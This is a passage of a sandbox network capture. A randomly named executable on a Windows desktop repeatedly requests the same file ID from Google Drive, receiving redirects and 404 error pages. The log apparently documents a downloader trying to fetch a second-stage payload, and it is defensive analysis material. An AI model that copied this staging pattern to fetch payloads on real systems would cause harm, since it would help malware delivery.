                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:00 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgR38k9ekxwDxSdsYR-3m1aY1A_jx5k62kG5pmCTOjq09a_O65wabBT-bFvZkMr9RjdR
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:00 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-VAEdNDbi0Lfe6pIvhAfwKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 6a 46 75 4b 50 57 4d 38 4e 70 71 4c 50 4f 48 70 45 58 59 62 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9jFuKPWM8NpqLPOHpEXYbA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    50192.168.2.752235172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:01 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:01 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:01 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-CP0qdCmPtOQsndJWfNtJ9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    51192.168.2.752236142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:02 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:03 UTC1851INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQqfCi4eVRg4oQApnPAvqVklbAgG2t8gSvdf3zcYeoTw_X6y9-27f3x9sn3_2JzfUjyXeaX2zU
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:02 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-wKWt0sHf383pA4KBnIxx2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:03 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 4a 44 46 65 6c 45 56 38 7a 74 36 48 35 4b 50 32 75 50 56 51 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iJDFelEV8zt6H5KP2uPVQg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    52192.168.2.752237172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:03 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:04 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:04 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: script-src 'nonce-pgMwlHZSM7dAzw-vG5rKiw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    53192.168.2.752238142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:04 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:05 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQXAhPWR9XxZT7Zf1avqSYLdKrJi9eWhWatEqjOHtg3NYPwz9SiLzN5HZ_Ofitno5DV
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:05 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-KyS7PoPuWwSleTI2YPIWJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:05 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 76 38 71 55 6b 6d 4e 33 36 79 51 61 61 79 6d 5a 58 54 59 4f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7v8qUkmN36yQaaymZXTYOA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    54192.168.2.752239172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:06 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:06 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:06 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-1F1ufacRn7FDYNwbl-buEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    55192.168.2.752240142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:07 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:07 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgRLN2hHNgHadDyjbHkDIejP_rc_PEBZvlpo8Zr1Nrw_4nLmhUHWWUUepfsPn57wBl9Y
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:07 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-0XQU5w46C9o9sFj8tcf-MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:07 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 6d 48 75 45 43 67 79 7a 36 33 74 46 53 4b 53 39 48 6f 55 58 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HmHuECgyz63tFSKS9HoUXg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    56192.168.2.752241172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:08 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:08 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:08 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-5QIylEcl3opirMTmiobMVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
